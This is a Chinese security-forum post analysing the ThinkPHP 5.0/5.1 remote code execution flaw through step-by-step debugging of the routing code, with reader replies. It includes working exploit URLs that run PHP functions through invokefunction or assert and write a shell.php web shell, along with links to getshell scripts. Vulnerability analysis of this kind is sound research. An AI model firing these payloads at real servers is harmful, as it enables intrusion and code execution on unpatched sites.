用户
搜索
  • TA的每日心情
    慵懒
    昨天 11:24
  • 签到天数: 137 天

    连续签到: 1 天

    [LV.7]常住居民III

    i春秋作家

    i春秋十五军装逼团团长

    Rank: 7Rank: 7Rank: 7

    32

    主题

    112

    帖子

    1433

    魔法币
    收听
    0
    粉丝
    16
    注册时间
    2018-3-1

    i春秋签约作者春秋文阁积极活跃奖春秋游侠

    F0rmat i春秋作家 i春秋十五军装逼团团长 i春秋签约作者 春秋文阁 积极活跃奖 春秋游侠 楼主
    发表于 2018-12-22 15:11:47 79724
    本帖最后由 F0rmat 于 2018-12-22 07:14 编辑

    0x01 前言

    首发了博客:https://getpass.cn/2018/12/22/ThinkPHP5-remote-code-execution-vulnerability-dynamic-analysis/
    这个漏洞已经过去了十多天了,最近比较忙,一直没有写分析的文章。今天抽点时间出来写一篇动态分析的文章,远程执行漏洞用动态分析比较方便也看出整个执行的过程和一些变量参数。

    ThinkPHP官方最近修复了一个严重的远程代码执行漏洞。这个主要漏洞原因是由于框架对控制器名没有进行足够的校验导致在没有开启强制路由的情况下可以构造恶意语句执行远程命令,受影响的版本包括5.0和5.1版本。

    0x02 环境

    程序源码下载:http://www.thinkphp.cn/download/967.html
    Web环境:Windows 10 x64+PHPStudy 20018
    调试工具:phpstorm+xdebug(用vscode也可以,我比较习惯用phpstorm)

    xdebug调试配置可以参考我的一篇文章https://getpass.cn/2018/04/10/Breakpoint%20debugging%20with%20phpstorm+xdebug/

    因为我是从头分析到尾,所以要在设置里面勾上Break at first line in PHP script

    搭建就不多说了,放源码在根目录然后phpstudy启动!

    0x03 漏洞复现

    奉上我们的Poc:http://getpass.test/public/index.php?s=index/\think\Request/input&filter=phpinfo&data=1

    其实有很多利用的地方,到后面分析完再说。

    0x04 漏洞分析

    因为是从开始分析,也比较适合新手,虽然啰嗦了点哈,我就不演示去下某个断点了,如果有不懂的你们也可以在不懂的地方下一个断点然后继续分析(记得去掉Break at first line in PHP script再下断点)。

    有些不是重点的直接F7或者F8走下去,F7跟进Facade

    App.php初始化的地方,继续F8往下面走

    routeCheckF7跟进去

    到这里F7继续跟进去

    有些没有必要的函数就直接F8跳过去,到pathinfo()这里F7跟进去

    我们可以分析一下这个·pathinfo函数的代码$this->config->get('var_pathinfo')这一句是从配置文件config/app.php获取的值

    当请求报文包含$_GET['s'],就取其值作为pathinfo,并返回pathinfo给调用函数,所以我们可利用$_GET['s']来传递路由信息。

        public function pathinfo()
        {
            if (is_null($this->pathinfo)) {
                if (isset($_GET[$this->config->get('var_pathinfo')])) {
                    // 判断URL里面是否有兼容模式参数
                    $_SERVER['PATH_INFO'] = $_GET[$this->config->get('var_pathinfo')];
                    unset($_GET[$this->config->get('var_pathinfo')]);
                } elseif ($this->isCli()) {
                    // CLI模式下 index.php module/controller/action/params/...
                    $_SERVER['PATH_INFO'] = isset($_SERVER['argv'][1]) ? $_SERVER['argv'][1] : '';
                }
    
                // 分析PATHINFO信息
                if (!isset($_SERVER['PATH_INFO'])) {
                    foreach ($this->config->get('pathinfo_fetch') as $type) {
                        if (!empty($_SERVER[$type])) {
                            $_SERVER['PATH_INFO'] = (0 === strpos($_SERVER[$type], $_SERVER['SCRIPT_NAME'])) ?
                            substr($_SERVER[$type], strlen($_SERVER['SCRIPT_NAME'])) : $_SERVER[$type];
                            break;
                        }
                    }
                }
    
                $this->pathinfo = empty($_SERVER['PATH_INFO']) ? '/' : ltrim($_SERVER['PATH_INFO'], '/');
            }
    
            return $this->pathinfo;
        }

    可以看到return $this->pathinfo;返回的内容

    F7走,可以看到$pathinfo赋值给$this->path

    F7走到check的函数,如果开启了强制路由则会抛出异常,也就是说该漏洞在开启强制路由的情况下不受影响,但是默认是不开启的。

    后面看到实例化了UrlDispatch对象,将$url传递给了构造函数。

    再继续分析下去,中间有些不必要的直接F8走过就行了。可以看到将$url传递给了$action

    F7走下去,跳回了App.php,可以看到$dispatch返回来的值代入dispatch方法。

    F7走进去,可以看到传入的$dispatch赋值给了$this->dispatch,不过现在分析这个版本是有改动的,有些版本是在这里用dispatch代入下面会分析到的parseUrl方法,这个版本的是用$this->actionparseUrl方法的,继续分析下去,下面会分析到的。

    F7又返回了App.php的文件,可以看到执行调度这里$data = $dispatch->run();,我们F7跟进去

    这里就是上面所说的,$url是由thinkphp/library/think/route/Dispatch.php里面的$this->action = $action;传过来的。

    我们F7继续分析parseUrl方法,然后F8走到这里

    F7进到这个parseUrlPath方法里面,用/来分割[模块/控制器/操作]并存到$path数组里面

        private function parseUrlPath($url)
        {
            // 分隔符替换 确保路由定义使用统一的分隔符
            $url = str_replace('|', '/', $url);
            $url = trim($url, '/');
            $var = [];
    
            if (false !== strpos($url, '?')) {
                // [模块/控制器/操作?]参数1=值1&参数2=值2...
                $info = parse_url($url);
                $path = explode('/', $info['path']);
                parse_str($info['query'], $var);
            } elseif (strpos($url, '/')) {
                // [模块/控制器/操作]
                $path = explode('/', $url);
            } elseif (false !== strpos($url, '=')) {
                // 参数1=值1&参数2=值2...
                parse_str($url, $var);
            } else {
                $path = [$url];
            }
    
            return [$path, $var];
        }

    中间的继续F8往下走,返回的$route数组

    继续往下走,F7进去

    可以看到thinkphp/library/think/route/Dispatch.php类这里的$this->action的值变了。

    继续会走到thinkphp/library/think/route/dispatch/Module.php,可以看到$this->action赋值给了$result

    F8往下走,走到实例化控制器,这里的$controller是可控的,是由上面的$result[1]传过来的

     $controller = strip_tags($result[1] ?: $this->app->config('app.default_controller'));

    F7跟进去,当$name存在反斜杠时就直接将$name赋值给$class并返回。攻击者通过控制输入就可以操控类的实例化过程,从而造成代码执行漏洞。

    下面就是调用反射执行类的步骤了

    也可以往下看,这里是通过invokeMethod 函数动态调用方法的地方,可以看到$classthink\Requset的类,$methodinput

    后面就是把内容输出到浏览器的过程了

    0x05 漏洞分析回顾

    我们从POC来分析执行过程http://getpass.test/public/index.php?s=index/\think\Request/input&filter=phpinfo&data=1

    1. 开始我们分析pathinfo()函数的时候得只可以用s来获取路由信息
    2. parseUrlPath方法用来分割[模块/控制器/操作]格式
    3. 在后面传入$controller的时候,就是开始我们获取到路由的值,但是用反斜杠就开头,就是想要实例化的类
    4. 最后是反射函数,调用了input方法执行phpinfo()

    一定是要Request类里面的input方法来执行吗?

    不一定,视版本而决定。

    以下是先知大神分类出来的

    5.1是下面这些:

    think\Loader 
    Composer\Autoload\ComposerStaticInit289837ff5d5ea8a00f5cc97a07c04561
    think\Error 
    think\Container
    think\App 
    think\Env 
    think\Config 
    think\Hook 
    think\Facade
    think\facade\Env
    env
    think\Db
    think\Lang 
    think\Request 
    think\Log 
    think\log\driver\File
    think\facade\Route
    route
    think\Route 
    think\route\Rule
    think\route\RuleGroup
    think\route\Domain
    think\route\RuleItem
    think\route\RuleName
    think\route\Dispatch
    think\route\dispatch\Url
    think\route\dispatch\Module
    think\Middleware
    think\Cookie
    think\View
    think\view\driver\Think
    think\Template
    think\template\driver\File
    think\Session
    think\Debug
    think\Cache
    think\cache\Driver
    think\cache\driver\File

    5.0 的有:

    think\Route
    think\Config
    think\Error
    think\App
    think\Request
    think\Hook
    think\Env
    think\Lang
    think\Log
    think\Loader

    两个版本公有的是:

    think\Route 
    think\Loader 
    think\Error 
    think\App 
    think\Env 
    think\Config 
    think\Hook 
    think\Lang 
    think\Request 
    think\Log

    5.1.x php版本>5.5:

    http://127.0.0.1/index.php?s=index/think\request/input?data[]=phpinfo()&filter=assert
    
    http://127.0.0.1/index.php?s=index/\think\Container/invokefunction&function=call_user_func_array&vars[0]=phpinfo&vars[1][]=1
    
    http://127.0.0.1/index.php?s=index/\think\template\driver\file/write?cacheFile=shell.php&content=<?php%20phpinfo();?>

    5.0.x php版本>=5.4:

    http://127.0.0.1/index.php?s=index/think\app/invokefunction&function=call_user_func_array&vars[0]=assert&vars[1][]=phpinfo()

    这里也不写getshell的python脚本了 ,可以参考

    https://github.com/theLSA/tp5-getshell

    https://payloads.online/archivers/2018-12-05/1

    0x06 补丁分析

    下面是针对5.0和5.1的补丁,添加了正则过滤,导致无法再传入\think\app这种形式的控制器。

    0x07 结束

    很多天没发文章,这个洞还是蛮厉害的,前段时间爆发的时候还看到有人用这个洞扫全网的ip。

    0x08 参考

    https://www.secpulse.com/archives/92835.html

    https://paper.seebug.org/760/

    https://www.kancloud.cn/manual/thinkphp5_1/353946

    http://www.lsablog.com/networksec/penetration/thinkphp5-rce-analysis/

    https://iaq.pw/archives/106

    https://xz.aliyun.com/t/3570

    本帖被以下淘专辑推荐:

    getpass.cn
    发表于 2018-12-22 20:54:25
    感谢大神分享
    ―无名小卒―
         RG路过
           (-.-)
    ――――――
    使用道具 举报 回复
    发表于 2018-12-25 10:20:43
    先学习一下!
    使用道具 举报 回复
    貌似影响蛮大的= =!
    使用道具 举报 回复
    发表于 2018-12-28 16:51:26

    先学习一下
    使用道具 举报 回复
    可以可以 不过好多不存在的就很蛋疼了前几天碰到了一个5.0的一直利用失败 public/index还不存在
    使用道具 举报 回复
    F0rmat i春秋作家 i春秋十五军装逼团团长 i春秋签约作者 春秋文阁 积极活跃奖 春秋游侠
    6#
    发表于 2019-1-6 11:27:22
    whoami王尼玛 发表于 2019-1-3 21:29
    可以可以 不过好多不存在的就很蛋疼了前几天碰到了一个5.0的一直利用失败 public/index还不存在{:3 ...

    不一定要public/index存在 ,其他控制器也可以利用
    getpass.cn
    使用道具 举报 回复
    F0rmat 发表于 2019-1-6 11:27
    不一定要public/index存在 ,其他控制器也可以利用

    现在一直在在整理控制器
    使用道具 举报 回复
    发新帖
    您需要登录后才可以回帖 登录 | 立即注册